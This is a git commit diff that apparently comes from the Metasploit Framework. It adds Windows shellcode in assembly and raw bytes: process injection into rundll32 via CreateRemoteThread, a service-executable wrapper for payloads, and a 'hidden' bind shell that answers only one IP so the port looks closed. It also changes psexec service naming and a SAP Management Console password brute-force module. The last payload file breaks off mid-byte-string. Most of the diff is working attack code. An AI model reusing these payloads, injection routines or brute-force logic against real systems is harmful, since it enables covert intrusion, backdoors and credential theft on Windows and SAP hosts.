Merge branch 'master' into staging/electro-release

bug/bundler_fix
David Maloney 2014-06-09 10:27:22 -05:00
commit 482aa2ea08
No known key found for this signature in database
GPG Key ID: DEDBA9DC3A913DB2
14 changed files with 649 additions and 65 deletions

View File

@ -11,7 +11,7 @@ $%{var_win32_func} = Add-Type -memberDefinition $%{var_syscode} -Name "Win32" -n
%{shellcode}
$%{var_rwx} = $%{var_win32_func}::VirtualAlloc(0,0x1000,[Math]::Max($%{var_code}.Length, 0x1000),0x40)
$%{var_rwx} = $%{var_win32_func}::VirtualAlloc(0,[Math]::Max($%{var_code}.Length,0x1000),0x3000,0x40)
for ($%{var_iter}=0;$%{var_iter} -le ($%{var_code}.Length-1);$%{var_iter}++) {
$%{var_win32_func}::memset([IntPtr]($%{var_rwx}.ToInt32()+$%{var_iter}), $%{var_code}[$%{var_iter}], 1) | Out-Null

View File

@ -0,0 +1,82 @@
;-----------------------------------------------------------------------------;
; Author: agix (florian.gaultier[at]gmail[dot]com)
; Compatible: Windows 7, 2008, Vista, 2003, XP, 2000, NT4
; Size: 307 bytes
;-----------------------------------------------------------------------------;
[BITS 32]
; Input: EBP must be the address of 'api_call'.
xor edi, edi
push 0x00000004 ;PAGE_READWRITE
push 0x00001000 ;MEM_COMMIT
push 0x00000054 ;STARTUPINFO+PROCESS_INFORMATION
push edi
push 0xE553A458 ;call VirtualAlloc()
call ebp
mov dword [eax], 0x44
lea esi, [eax+0x44]
push edi
push 0x6578652e
push 0x32336c6c
push 0x646e7572
mov ecx, esp ;"rundll32.exe"
push esi ;lpProcessInformation
push eax ;lpStartupInfo
push edi ;lpCurrentDirectory
push edi ;lpEnvironment
push 0x00000044 ;dwCreationFlags
push edi ;bInheritHandles
push edi ;lpThreadAttributes
push edi ;lpProcessAttributes
push ecx ;lpCommandLine
push edi ;lpApplicationName
push 0x863FCC79
call ebp ;call CreatProcessA()
mov ecx, [esi]
push 0x00000040 ;PAGE_EXECUTE_READWRITE
push 0x00001000 ;MEM_COMMIT
push 0x00001000 ;Next Shellcode Size
push edi
push ecx ;hProcess
push 0x3F9287AE ;call VirtualAllocEx()
call ebp
call me2
me2:
pop edx
mov edi, eax
mov ecx, [esi]
add dword edx, 0x112247 ;pointer on the next shellcode
push esp
push 0x00001000 ;Next Shellcode Size
push edx ;
push eax ;lBaseAddress
push ecx ;hProcess
push 0xE7BDD8C5
call ebp ;call WriteProcessMemory()
xor eax, eax
mov ecx, [esi]
push eax ;lpThreadId
push eax ;dwCreationFlags
push eax ;lpParameter
push edi ;lpStartAddress
push eax ;dwStackSize
push eax ;lpThreadAttributes
push ecx ;hProcess
push 0x799AACC6
call ebp ;call CreateRemoteThread()
mov ecx, [esi]
push ecx
push 0x528796C6
call ebp ;call CloseHandle()
mov ecx, [esi+0x4]
push ecx
push 0x528796C6
call ebp ;call CloseHandle()

View File

@ -0,0 +1,91 @@
;-----------------------------------------------------------------------------;
; Original Shellcode: Stephen Fewer (stephen_fewer@harmonysecurity.com)
; Modified version to add Hidden ACL support: Borja Merino (bmerinofe@gmail.com)
; Compatible: Windows 7, 2008, Vista, 2003, XP, 2000, NT4
; Version: 1.0 (February 2014)
;-----------------------------------------------------------------------------;
[BITS 32]
; Input: EBP must be the address of 'api_call'.
; Output: EDI will be the newly connected clients socket
; Clobbers: EAX, EBX, ESI, EDI, ESP will also be modified (-0x1A0)
bind_tcp:
push 0x00003233 ; Push the bytes 'ws2_32',0,0 onto the stack.
push 0x5F327377 ; ...
push esp ; Push a pointer to the "ws2_32" string on the stack.
push 0x0726774C ; hash( "kernel32.dll", "LoadLibraryA" )
call ebp ; LoadLibraryA( "ws2_32" )
mov eax, 0x0190 ; EAX = sizeof( struct WSAData )
sub esp, eax ; alloc some space for the WSAData structure
push esp ; push a pointer to this stuct
push eax ; push the wVersionRequested parameter
push 0x006B8029 ; hash( "ws2_32.dll", "WSAStartup" )
call ebp ; WSAStartup( 0x0190, &WSAData );
push eax ; if we succeed, eax wil be zero, push zero for the flags param.
push eax ; push null for reserved parameter
push eax ; we do not specify a WSAPROTOCOL_INFO structure
push eax ; we do not specify a protocol
inc eax ;
push eax ; push SOCK_STREAM
inc eax ;
push eax ; push AF_INET
push 0xE0DF0FEA ; hash( "ws2_32.dll", "WSASocketA" )
call ebp ; WSASocketA( AF_INET, SOCK_STREAM, 0, 0, 0, 0 );
xchg edi, eax ; save the socket for later, don't care about the value of eax after this
xor ebx, ebx ; Clear EBX
push ebx ; bind to 0.0.0.0
push 0x5C110002 ; family AF_INET and port 4444
mov esi, esp ; save a pointer to sockaddr_in struct
push byte 16 ; length of the sockaddr_in struct (we only set the first 8 bytes as the last 8 are unused)
push esi ; pointer to the sockaddr_in struct
push edi ; socket
push 0x6737DBC2 ; hash( "ws2_32.dll", "bind" )
call ebp ; bind( s, &sockaddr_in, 16 );
; Hidden ACL Support ----------
push 0x1 ; size, in bytes, of the buffer pointed to by the "optval" parameter
push esp ; optval: pointer to the buffer in which the value for the requested option is specified
push 0x3002 ; level at which the option is defined: SOL_SOCKET
push 0xFFFF ; the socket option for which the value is to be set: SO_CONDITIONAL_ACCEPT
push edi ; socket descriptor
push 0x2977A2F1 ; hash( "ws2_32.dll", "setsockopt" )
call ebp ; setsockopt(s, SOL_SOCKET, SO_CONDITIONAL_ACCEPT, &bOptVal, 1 );
push ebx ; backlog
push edi ; socket
push 0xFF38E9B7 ; hash( "ws2_32.dll", "listen" )
call ebp ; listen( s, 0 );
condition:
push ebx ; dwCallbackData (ebx = 0, no data needed for the condition function)
call wsaaccept ; push the start of the condition function on the stack
mov eax, DWORD [esp+4] ;
mov eax, DWORD [eax+4] ;
mov eax, DWORD [eax+4] ; get the client IP returned in the stack
sub eax, 0x2101A8C0 ; compare the client IP with the IP allowed
jz return ; if equal returns CF_ACCEPT
xor eax, eax ; If not equal, the condition function returns CF_REJECT
inc eax
return:
retn 0x20 ; some stack alignment needed to return to mswsock
wsaaccept:
push ebx ; length of the sockaddr = nul
push ebx ; struct sockaddr = nul
push edi ; socket descriptor
push 0x33BEAC94 ; hash( "ws2_32.dll", "wsaaccept" )
call ebp ; wsaaccept( s, 0, 0, &fnCondition, 0)
inc eax
jz condition ; if error (eax = -1) jump to condition function to wait for another connection
dec eax
push edi ; push the listening socket to close
xchg edi, eax ; replace the listening socket with the new connected socket for further comms
push 0x614D6E75 ; hash( "ws2_32.dll", "closesocket" )
call ebp ; closesocket( s );

View File

@ -0,0 +1,64 @@
;-----------------------------------------------------------------------------;
; Author: agix (florian.gaultier[at]gmail[dot]com)
; Compatible: Windows 7, 2008, Vista, 2003, XP, 2000, NT4
; Size: 448 bytes
;-----------------------------------------------------------------------------;
[BITS 32]
; Input: EBP must be the address of 'api_call'.
push byte 0x0
push 0x32336970
push 0x61766461
push esp
push 0x726774c
call ebp ;load advapi32.dll
push 0x00454349
push 0x56524553
mov ecx, esp ;ServiceTableEntry.SVCNAME
lea eax, [ebp+0xd0];ServiceTableEntry.SvcMain
push 0x00000000
push eax
push ecx
mov eax,esp
push 0x00000000
push eax
push 0xCB72F7FA
call ebp ;call StartServiceCtrlDispatcherA(ServiceTableEntry)
push 0x00000000
push 0x56A2B5F0
call ebp ;call ExitProcess(0)
pop eax ;SvcCtrlHandler
pop eax
pop eax
pop eax
xor eax,eax
ret
cld ;SvcMain
call me
me:
pop ebp
sub ebp, 0xd6 ;ebp => hashFunction
push 0x00464349
push 0x56524553
mov ecx, esp ;SVCNAME
lea eax, [ebp+0xc9];SvcCtrlHandler
push 0x00000000
push eax
push ecx
push 0x5244AA0B
call ebp ;RegisterServiceCtrlHandlerExA
push 0x00000000
push 0x00000000
push 0x00000000
push 0x00000000
push 0x00000000
push 0x00000000
push 0x00000004
push 0x00000010
mov ecx, esp
push 0x00000000
push ecx
push eax
push 0x7D3755C6
call ebp ;SetServiceStatus RUNNING

View File

@ -0,0 +1,41 @@
;-----------------------------------------------------------------------------;
; Author: agix (florian.gaultier[at]gmail[dot]com)
; Compatible: Windows 7, 2008, Vista, 2003, XP, 2000, NT4
; Size: 448 bytes
;-----------------------------------------------------------------------------;
[BITS 32]
; Input: EBP must be the address of 'api_call'.
push 0x000F003F
push 0x00000000
push 0x00000000
push 0x7636F067
call ebp ;OpenSCManagerA
mov edi, eax
push 0x00464349
push 0x56524553
mov ecx, esp ;SVCNAME
push 0x000F01FF
push ecx
push eax
push 0x404B2856
call ebp ;OpenServiceA
mov esi, eax
push 0x00464349
push 0x56524553
mov ecx, esp
push 0x00000000
push ecx
mov ecx, esp ;SVCDESCRIPTION
push ecx
push 0x00000001 ;SERVICE_CONFIG_DESCRIPTION
push eax
push 0xED35B087
call ebp ;ChangeServiceConfig2A
push esi
push 0xAD77EADE ;CloseServiceHandle
call ebp
push edi
push 0xAD77EADE ;CloseServiceHandle
call ebp

View File

@ -0,0 +1,45 @@
;-----------------------------------------------------------------------------;
; Author: agix (florian.gaultier[at]gmail[dot]com)
; Compatible: Windows 7, 2008, Vista, 2003, XP, 2000, NT4
; Size: 448 bytes
;-----------------------------------------------------------------------------;
[BITS 32]
; Input: EBP must be the address of 'api_call'.
call me3
me3:
pop edi
jmp 0x7
pop eax
pop eax
pop eax
pop eax
xor eax,eax
ret
push 0x00464349
push 0x56524553
mov ecx, esp ;SVCNAME
lea eax, [edi+0x3];SvcCtrlHandler
push 0x00000000
push eax
push ecx
push 0x5244AA0B
call ebp ;RegisterServiceCtrlHandlerExA
push 0x00000000
push 0x00000000
push 0x00000000
push 0x00000000
push 0x00000000
push 0x00000000
push 0x00000001
push 0x00000010
mov ecx, esp
push 0x00000000
push ecx
push eax
push 0x7D3755C6
call ebp ;SetServiceStatus RUNNING
push 0x0
push 0x56a2b5f0
call ebp ;ExitProcess

View File

@ -0,0 +1,16 @@
;-----------------------------------------------------------------------------;
; Author: agix (florian.gaultier[at]gmail[dot]com)
; Compatible: Windows 7, 2008, Vista, 2003, XP, 2000, NT4
; Size: 307 bytes
; Build: >build.py single_create_remote_process
;-----------------------------------------------------------------------------;
[BITS 32]
[ORG 0]
cld ; Clear the direction flag.
call start ; Call start, this pushes the address of 'api_call' onto the stack.
%include "./src/block/block_api.asm"
start: ;
pop ebp ; pop off the address of 'api_call' for calling later.
%include "./src/block/block_create_remote_process.asm"

View File

@ -0,0 +1,23 @@
;-----------------------------------------------------------------------------;
; Author: agix (florian.gaultier[at]gmail[dot]com)
; Compatible: Windows 7, 2008, Vista, 2003, XP, 2000, NT4
; Size: 448 bytes
; Build: >build.py single_service_stuff
;-----------------------------------------------------------------------------;
[BITS 32]
[ORG 0]
cld ; Clear the direction flag.
call start ; Call start, this pushes the address of 'api_call' onto the stack.
%include "./src/block/block_api.asm"
start: ;
pop ebp ; pop off the address of 'api_call' for calling later.
%include "./src/block/block_service.asm"
%include "./src/block/block_service_change_description.asm"
%include "./src/block/block_create_remote_process.asm"
%include "./src/block/block_service_stopped.asm"
push edi
push 0x56A2B5F0
call ebp ;call ExitProcess(0)

View File

@ -0,0 +1,20 @@
;-----------------------------------------------------------------------------;
; Author: Stephen Fewer (stephen_fewer[at]harmonysecurity[dot]com)
; Compatible: Windows 7, 2008, Vista, 2003, XP, 2000, NT4
; Version: 1.0 (28 July 2009)
; Size: 341 bytes
; Build: >build.py single_shell_bind_tcp
;-----------------------------------------------------------------------------;
[BITS 32]
[ORG 0]
cld ; Clear the direction flag.
call start ; Call start, this pushes the address of 'api_call' onto the stack.
%include "./src/block/block_api.asm"
start: ;
pop ebp ; Pop off the address of 'api_call' for calling later.
%include "./src/block/block_hidden_bind_tcp.asm"
; By here we will have performed the bind_tcp connection and EDI will be out socket.
%include "./src/block/block_shell.asm"
; Finish up with the EXITFUNK.
%include "./src/block/block_exitfunk.asm"

View File

@ -51,8 +51,11 @@ module Exploit::Remote::SMB::Psexec
# instead of all the ghetto "rescue ::Exception" madness
# @param command [String] Should be a valid windows command
# @param disconnect [Boolean] Disconnect afterwards
# @param service_description [String] Service Description
# @param service_name [String] Service Name
# @param display_name [Strnig] Display Name
# @return [Boolean] Whether everything went well
def psexec(command, disconnect=true, service_description=nil)
def psexec(command, disconnect=true, service_description=nil, service_name=nil, display_name=nil)
simple.connect("\\\\#{datastore['RHOST']}\\IPC$")
handle = dcerpc_handle('367abb81-9844-35f1-ad32-98f038001003', '2.0', 'ncacn_np', ["\\svcctl"])
vprint_status("#{peer} - Binding to #{handle} ...")
@ -70,8 +73,8 @@ module Exploit::Remote::SMB::Psexec
print_error("#{peer} - Error getting scm handle: #{e}")
return false
end
servicename = Rex::Text.rand_text_alpha(11)
displayname = Rex::Text.rand_text_alpha(16)
servicename = service_name || Rex::Text.rand_text_alpha(11)
displayname = display_name || Rex::Text.rand_text_alpha(16)
svc_handle = nil
svc_status = nil

View File

@ -299,7 +299,6 @@ require 'msf/core/exe/segment_injector'
end
def self.to_winpe_only(framework, code, opts={}, arch="x86")
if arch == ARCH_X86_64
arch = ARCH_X64
end
@ -314,26 +313,56 @@ require 'msf/core/exe/segment_injector'
exe = fd.read(fd.stat.size)
}
pe_header_size = 0x18
entryPoint_offset = 0x28
section_size = 0x28
characteristics_offset = 0x24
virtualAddress_offset = 0x0c
sizeOfRawData_offset = 0x10
sections_table_offset =
pe._dos_header.v['e_lfanew'] +
pe._file_header.v['SizeOfOptionalHeader'] +
pe_header_size
sections_table_characteristics_offset = sections_table_offset + characteristics_offset
sections_header = []
pe._file_header.v['NumberOfSections'].times { |i| sections_header << [(i*0x28)+pe.rva_to_file_offset(pe._dos_header.v['e_lfanew']+pe._file_header.v['SizeOfOptionalHeader']+0x18+0x24),exe[(i*0x28)+pe.rva_to_file_offset(pe._dos_header.v['e_lfanew']+pe._file_header.v['SizeOfOptionalHeader']+0x18),0x28]] }
pe._file_header.v['NumberOfSections'].times { |i|
section_offset = sections_table_offset + (i * section_size)
sections_header << [
sections_table_characteristics_offset + (i * section_size),
exe[section_offset,section_size]
]
}
addressOfEntryPoint = pe.hdr.opt.AddressOfEntryPoint
#look for section with entry point
# look for section with entry point
sections_header.each do |sec|
virtualAddress = sec[1][0xc,0x4].unpack('L')[0]
sizeOfRawData = sec[1][0x10,0x4].unpack('L')[0]
characteristics = sec[1][0x24,0x4].unpack('L')[0]
if pe.hdr.opt.AddressOfEntryPoint >= virtualAddress && pe.hdr.opt.AddressOfEntryPoint < virtualAddress+sizeOfRawData
#put this section writable
characteristics|=0x80000000
virtualAddress = sec[1][virtualAddress_offset,0x4].unpack('L')[0]
sizeOfRawData = sec[1][sizeOfRawData_offset,0x4].unpack('L')[0]
characteristics = sec[1][characteristics_offset,0x4].unpack('L')[0]
if (virtualAddress...virtualAddress+sizeOfRawData).include?(addressOfEntryPoint)
importsTable = pe.hdr.opt.DataDirectory[8..(8+4)].unpack('L')[0]
if (importsTable - addressOfEntryPoint) < code.length
#shift original entry point to prevent tables overwritting
addressOfEntryPoint = importsTable - (code.length + 4)
entry_point_offset = pe._dos_header.v['e_lfanew'] + entryPoint_offset
exe[entry_point_offset,4] = [addressOfEntryPoint].pack('L')
end
# put this section writable
characteristics |= 0x8000_0000
newcharacteristics = [characteristics].pack('L')
exe[sec[0],newcharacteristics.length]=newcharacteristics
exe[sec[0],newcharacteristics.length] = newcharacteristics
end
end
#put the shellcode at the entry point, overwriting template
exe[pe.rva_to_file_offset(pe.hdr.opt.AddressOfEntryPoint),code.length]=code
# put the shellcode at the entry point, overwriting template
entryPoint_file_offset = pe.rva_to_file_offset(addressOfEntryPoint)
exe[entryPoint_file_offset,code.length] = code
return exe
end
@ -383,6 +412,33 @@ require 'msf/core/exe/segment_injector'
return pe
end
# Splits a string into a number of assembly push operations
#
# @param string [String] string to be used
#
# @return [String] null terminated string as assembly push ops
def self.string_to_pushes(string)
str = string.dup
# Align string to 4 bytes
rem = (str.length) % 4
if (rem > 0)
str << "\x00" * (4 - rem)
pushes = ''
else
pushes = "h\x00\x00\x00\x00"
end
# string is now 4 bytes aligned with null byte
# push string to stack, starting at the back
while (str.length > 0)
four = 'h'+str.slice!(-4,4)
pushes << four
end
pushes
end
def self.exe_sub_method(code,opts ={})
pe = ''
@ -462,11 +518,82 @@ require 'msf/core/exe/segment_injector'
exe_sub_method(code,opts)
end
# Embeds shellcode within a Windows PE file implementing the Windows
# service control methods.
#
# @param framework [Object]
# @param code [String] shellcode to be embedded
# @option opts [Boolean] :sub_method use substitution technique with a
# service template PE
# @option opts [String] :servicename name of the service, not used in
# substituion technique
#
# @return [String] Windows Service PE file
def self.to_win32pe_service(framework, code, opts={})
if opts[:sub_method]
# Allow the user to specify their own service EXE template
set_template_default(opts, "template_x86_windows_svc.exe")
opts[:exe_type] = :service_exe
exe_sub_method(code,opts)
return exe_sub_method(code,opts)
else
name = opts[:servicename]
name ||= Rex::Text.rand_text_alpha(8)
pushed_service_name = string_to_pushes(name)
precode_size = 0xc6
svcmain_code_offset = precode_size + pushed_service_name.length
precode_size = 0xcc
hash_code_offset = precode_size + pushed_service_name.length
precode_size = 0xbf
svcctrlhandler_code_offset = precode_size + pushed_service_name.length
code_service_stopped =
"\xE8\x00\x00\x00\x00\x5F\xEB\x07\x58\x58\x58\x58\x31\xC0\xC3" +
pushed_service_name+"\x89\xE1\x8D\x47\x03\x6A\x00" +
"\x50\x51\x68\x0B\xAA\x44\x52\xFF\xD5\x6A\x00\x6A\x00\x6A\x00\x6A" +
"\x00\x6A\x00\x6A\x00\x6A\x01\x6A\x10\x89\xE1\x6A\x00\x51\x50\x68" +
"\xC6\x55\x37\x7D\xFF\xD5\x57\x68\xF0\xB5\xA2\x56\xFF\xD5"
precode_size = 0x42
shellcode_code_offset = code_service_stopped.length + precode_size
# code_service could be encoded in the future
code_service =
"\xFC\xE8\x89\x00\x00\x00\x60\x89\xE5\x31\xD2\x64\x8B\x52\x30\x8B" +
"\x52\x0C\x8B\x52\x14\x8B\x72\x28\x0F\xB7\x4A\x26\x31\xFF\x31\xC0" +
"\xAC\x3C\x61\x7C\x02\x2C\x20\xC1\xCF\x0D\x01\xC7\xE2\xF0\x52\x57" +
"\x8B\x52\x10\x8B\x42\x3C\x01\xD0\x8B\x40\x78\x85\xC0\x74\x4A\x01" +
"\xD0\x50\x8B\x48\x18\x8B\x58\x20\x01\xD3\xE3\x3C\x49\x8B\x34\x8B" +
"\x01\xD6\x31\xFF\x31\xC0\xAC\xC1\xCF\x0D\x01\xC7\x38\xE0\x75\xF4" +
"\x03\x7D\xF8\x3B\x7D\x24\x75\xE2\x58\x8B\x58\x24\x01\xD3\x66\x8B" +
"\x0C\x4B\x8B\x58\x1C\x01\xD3\x8B\x04\x8B\x01\xD0\x89\x44\x24\x24" +
"\x5B\x5B\x61\x59\x5A\x51\xFF\xE0\x58\x5F\x5A\x8B\x12\xEB\x86\x5D" +
"\x6A\x00\x68\x70\x69\x33\x32\x68\x61\x64\x76\x61\x54\x68\x4C\x77" +
"\x26\x07\xFF\xD5"+pushed_service_name+"\x89\xE1" +
"\x8D\x85"+[svcmain_code_offset].pack('<I')+"\x6A\x00\x50\x51\x89\xE0\x6A\x00\x50\x68" +
"\xFA\xF7\x72\xCB\xFF\xD5\x6A\x00\x68\xF0\xB5\xA2\x56\xFF\xD5\x58" +
"\x58\x58\x58\x31\xC0\xC3\xFC\xE8\x00\x00\x00\x00\x5D\x81\xED" +
[hash_code_offset].pack('<I')+pushed_service_name+"\x89\xE1\x8D" +
"\x85"+[svcctrlhandler_code_offset].pack('<I')+"\x6A\x00\x50\x51\x68\x0B\xAA\x44\x52\xFF\xD5" +
"\x6A\x00\x6A\x00\x6A\x00\x6A\x00\x6A\x00\x6A\x00\x6A\x04\x6A\x10" +
"\x89\xE1\x6A\x00\x51\x50\x68\xC6\x55\x37\x7D\xFF\xD5\x31\xFF\x6A" +
"\x04\x68\x00\x10\x00\x00\x6A\x54\x57\x68\x58\xA4\x53\xE5\xFF\xD5" +
"\xC7\x00\x44\x00\x00\x00\x8D\x70\x44\x57\x68\x2E\x65\x78\x65\x68" +
"\x6C\x6C\x33\x32\x68\x72\x75\x6E\x64\x89\xE1\x56\x50\x57\x57\x6A" +
"\x44\x57\x57\x57\x51\x57\x68\x79\xCC\x3F\x86\xFF\xD5\x8B\x0E\x6A" +
"\x40\x68\x00\x10\x00\x00\x68"+[code.length].pack('<I')+"\x57\x51\x68\xAE\x87" +
"\x92\x3F\xFF\xD5\xE8\x00\x00\x00\x00\x5A\x89\xC7\x8B\x0E\x81\xC2" +
[shellcode_code_offset].pack('<I')+"\x54\x68"+[code.length].pack('<I') +
"\x52\x50\x51\x68\xC5\xD8\xBD\xE7\xFF" +
"\xD5\x31\xC0\x8B\x0E\x50\x50\x50\x57\x50\x50\x51\x68\xC6\xAC\x9A" +
"\x79\xFF\xD5\x8B\x0E\x51\x68\xC6\x96\x87\x52\xFF\xD5\x8B\x4E\x04" +
"\x51\x68\xC6\x96\x87\x52\xFF\xD5" +
code_service_stopped
return to_winpe_only(framework, code_service + code, opts)
end
end
def self.to_win64pe_service(framework, code, opts={})

View File

@ -16,13 +16,10 @@ class Metasploit4 < Msf::Auxiliary
super(
'Name' => 'SAP Management Console Brute Force',
'Description' => %q{
This module simply attempts to brute force the username |
password for the SAP Management Console SOAP Interface. By
setting the SAP SID value, a list of default SAP users can be
tested without needing to set a USERNAME or USER_FILE value.
The default usernames are stored in
./data/wordlists/sap_common.txt (the value of SAP SID is
automatically inserted into the username to replce <SAPSID>).
This module simply attempts to brute force the username and
password for the SAP Management Console SOAP Interface. If
the SAP_SID value is set it will replace instances of <SAPSID>
in any user/pass from any wordlist.
},
'References' =>
[
@ -36,49 +33,43 @@ class Metasploit4 < Msf::Auxiliary
register_options(
[
Opt::RPORT(50013),
OptString.new('SAP_SID', [false, 'Input SAP SID to attempt brute-forcing standard SAP accounts ', '']),
OptString.new('URI', [false, 'Path to the SAP Management Console ', '/']),
OptString.new('SAP_SID', [false, 'Input SAP SID to attempt brute-forcing standard SAP accounts ', nil]),
OptString.new('TARGETURI', [false, 'Path to the SAP Management Console ', '/']),
OptPath.new('USER_FILE', [ false, "File containing users, one per line",
File.join(Msf::Config.data_directory, "wordlists", "sap_common.txt") ])
], self.class)
register_autofilter_ports([ 50013 ])
end
def run_host(ip)
def run_host(rhost)
uri = normalize_uri(target_uri.path)
res = send_request_cgi({
'uri' => normalize_uri(datastore['URI']),
'uri' => uri,
'method' => 'GET'
}, 25)
})
if not res
print_error("#{rhost}:#{rport} [SAP] Unable to connect")
print_error("#{peer} [SAP] Unable to connect")
return
end
if datastore['SAP_SID'] != ''
if !datastore['USER_FILE'].nil?
print_status("SAPSID set to '#{datastore['SAP_SID']}' - Using provided wordlist")
elsif !datastore['USERPASS_FILE'].nil?
print_status("SAPSID set to '#{datastore['SAP_SID']}' - Using provided wordlist")
else
print_status("SAPSID set to '#{datastore['SAP_SID']}' - Setting default SAP wordlist")
datastore['USER_FILE'] = Msf::Config.data_directory + '/wordlists/sap_common.txt'
end
end
print_status("SAPSID set to '#{datastore['SAP_SID']}'") if datastore['SAP_SID']
each_user_pass do |user, pass|
enum_user(user,pass)
enum_user(user,pass,uri)
end
end
def enum_user(user, pass)
def enum_user(user, pass, uri)
# Replace placeholder with SAP SID, if present
if datastore['SAP_SID'] != ''
if datastore['SAP_SID']
user = user.gsub("<SAPSID>", datastore["SAP_SID"].downcase)
pass = pass.gsub("<SAPSID>", datastore["SAP_SID"])
end
print_status("#{rhost}:#{rport} - Trying username:'#{user}' password:'#{pass}'")
print_status("#{peer} - Trying username:'#{user}' password:'#{pass}'")
success = false
soapenv = 'http://schemas.xmlsoap.org/soap/envelope/'
@ -103,7 +94,7 @@ class Metasploit4 < Msf::Auxiliary
begin
res = send_request_raw({
'uri' => normalize_uri(datastore['URI']),
'uri' => uri,
'method' => 'POST',
'data' => data,
'headers' =>
@ -113,9 +104,9 @@ class Metasploit4 < Msf::Auxiliary
'Content-Type' => 'text/xml; charset=UTF-8',
'Authorization' => 'Basic ' + user_pass
}
}, 45)
})
return if not res
return unless res
if (res.code != 500 and res.code != 200)
return
@ -136,17 +127,17 @@ class Metasploit4 < Msf::Auxiliary
end
rescue ::Rex::ConnectionError
print_error("#{rhost}:#{rport} [SAP #{rhost}] Unable to connect")
print_error("#{peer} [SAP] Unable to connect")
return
end
if success
print_good("#{rhost}:#{rport} [SAP] Successful login '#{user}' password: '#{pass}'")
print_good("#{peer} [SAP] Successful login '#{user}' password: '#{pass}'")
if permission
vprint_good("#{rhost}:#{rport} [SAP] Login '#{user}' authorized to perform OSExecute calls")
vprint_good("#{peer} [SAP] Login '#{user}' authorized to perform OSExecute calls")
else
vprint_error("#{rhost}:#{rport} [SAP] Login '#{user}' NOT authorized to perform OSExecute calls")
vprint_error("#{peer} [SAP] Login '#{user}' NOT authorized to perform OSExecute calls")
end
report_auth_info(
@ -160,10 +151,9 @@ class Metasploit4 < Msf::Auxiliary
:target_host => rhost,
:target_port => rport
)
return
else
vprint_error("#{rhost}:#{rport} [SAP] failed to login as '#{user}':'#{pass}'")
return
vprint_error("#{peer} [SAP] failed to login as '#{user}':'#{pass}'")
end
end
end

View File

@ -81,7 +81,9 @@ class Metasploit3 < Msf::Exploit::Remote
OptBool.new('MOF_UPLOAD_METHOD', [true, "Use WBEM instead of RPC, ADMIN$ share will be mandatory. ( Not compatible with Vista+ )", false]),
OptBool.new('ALLOW_GUEST', [true, "Keep trying if only given guest access", false]),
OptString.new('SERVICE_FILENAME', [false, "Filename to to be used on target for the service binary",nil]),
OptString.new('SERVICE_DESCRIPTION', [false, "Service description to to be used on target for pretty listing",nil])
OptString.new('SERVICE_DESCRIPTION', [false, "Service description to to be used on target for pretty listing",nil]),
OptString.new('SERVICE_NAME', [false, "Servicename to to be used on target for the service binary and manager",nil]),
OptString.new('SERVICE_DISPLAYNAME', [false, "Service displayname to to be used on target for the service manager",nil])
], self.class)
end
@ -180,8 +182,9 @@ class Metasploit3 < Msf::Exploit::Remote
# Disconnect from the ADMIN$
simple.disconnect("ADMIN$")
else
servicename = rand_text_alpha(8)
servicename = datastore['SERVICE_NAME'] || rand_text_alpha(8)
servicedescription = datastore['SERVICE_DESCRIPTION']
displayname = datastore['SERVICE_DISPLAYNAME'] || 'M' + rand_text_alpha(rand(32)+1)
# Upload the shellcode to a file
print_status("Uploading payload...")
@ -227,7 +230,7 @@ class Metasploit3 < Msf::Exploit::Remote
file_location = "\\\\127.0.0.1\\#{smbshare}\\#{fileprefix}\\#{filename}"
end
psexec(file_location, false, servicedescription)
psexec(file_location, false, servicedescription, servicename, displayname)
print_status("Deleting \\#{filename}...")
sleep(1)

View File

@ -0,0 +1,79 @@
##
# This module requires Metasploit: http//metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
require 'msf/core/handler/bind_tcp'
require 'msf/base/sessions/command_shell'
require 'msf/base/sessions/command_shell_options'
module Metasploit3
include Msf::Payload::Windows
include Msf::Payload::Single
include Msf::Sessions::CommandShellOptions
def initialize(info = {})
super(merge_info(info,
'Name' => 'Windows Command Shell, Hidden Bind TCP Inline',
'Description' => 'Listen for a connection from certain IP and spawn a command shell.
The shellcode will reply with a RST packet if the connections is not
comming from the IP defined in AHOST. This way the port will appear
as "closed" helping us to hide the shellcode.',
'Author' =>
[
'vlad902', # original payload module (single_shell_bind_tcp)
'sd', # original payload module (single_shell_bind_tcp)
'Borja Merino <bmerinofe[at]gmail.com>' # Add Hidden ACL functionality
],
'License' => MSF_LICENSE,
'References' => ['URL', 'http://www.shelliscoming.com/2014/03/hidden-bind-shell-keep-your-shellcode.html'],
'Platform' => 'win',
'Arch' => ARCH_X86,
'Handler' => Msf::Handler::BindTcp,
'Session' => Msf::Sessions::CommandShell,
'Payload' =>
{
'Offsets' =>
{
'LPORT' => [ 200, 'n' ],
'AHOST' => [ 262, 'ADDR' ],
'EXITFUNC' => [ 363, 'V' ],
},
'Payload' =>
"\xfc\xe8\x89\x00\x00\x00\x60\x89\xe5\x31\xd2\x64\x8b\x52\x30\x8b" +
"\x52\x0c\x8b\x52\x14\x8b\x72\x28\x0f\xb7\x4a\x26\x31\xff\x31\xc0" +
"\xac\x3c\x61\x7c\x02\x2c\x20\xc1\xcf\x0d\x01\xc7\xe2\xf0\x52\x57" +
"\x8b\x52\x10\x8b\x42\x3c\x01\xd0\x8b\x40\x78\x85\xc0\x74\x4a\x01" +
"\xd0\x50\x8b\x48\x18\x8b\x58\x20\x01\xd3\xe3\x3c\x49\x8b\x34\x8b" +
"\x01\xd6\x31\xff\x31\xc0\xac\xc1\xcf\x0d\x01\xc7\x38\xe0\x75\xf4" +
"\x03\x7d\xf8\x3b\x7d\x24\x75\xe2\x58\x8b\x58\x24\x01\xd3\x66\x8b" +
"\x0c\x4b\x8b\x58\x1c\x01\xd3\x8b\x04\x8b\x01\xd0\x89\x44\x24\x24" +
"\x5b\x5b\x61\x59\x5a\x51\xff\xe0\x58\x5f\x5a\x8b\x12\xeb\x86\x5d" +
"\x68\x33\x32\x00\x00\x68\x77\x73\x32\x5f\x54\x68\x4c\x77\x26\x07" +
"\xff\xd5\xb8\x90\x01\x00\x00\x29\xc4\x54\x50\x68\x29\x80\x6b\x00" +
"\xff\xd5\x50\x50\x50\x50\x40\x50\x40\x50\x68\xea\x0f\xdf\xe0\xff" +
"\xd5\x97\x31\xdb\x53\x68\x02\x00\x11\x5c\x89\xe6\x6a\x10\x56\x57" +
"\x68\xc2\xdb\x37\x67\xff\xd5\x6a\x01\x54\x68\x02\x30\x00\x00\x68" +
"\xff\xff\x00\x00\x57\x68\xf1\xa2\x77\x29\xff\xd5\x53\x57\x68\xb7" +
"\xe9\x38\xff\xff\xd5\x53\xe8\x17\x00\x00\x00\x8b\x44\x24\x04\x8b" +
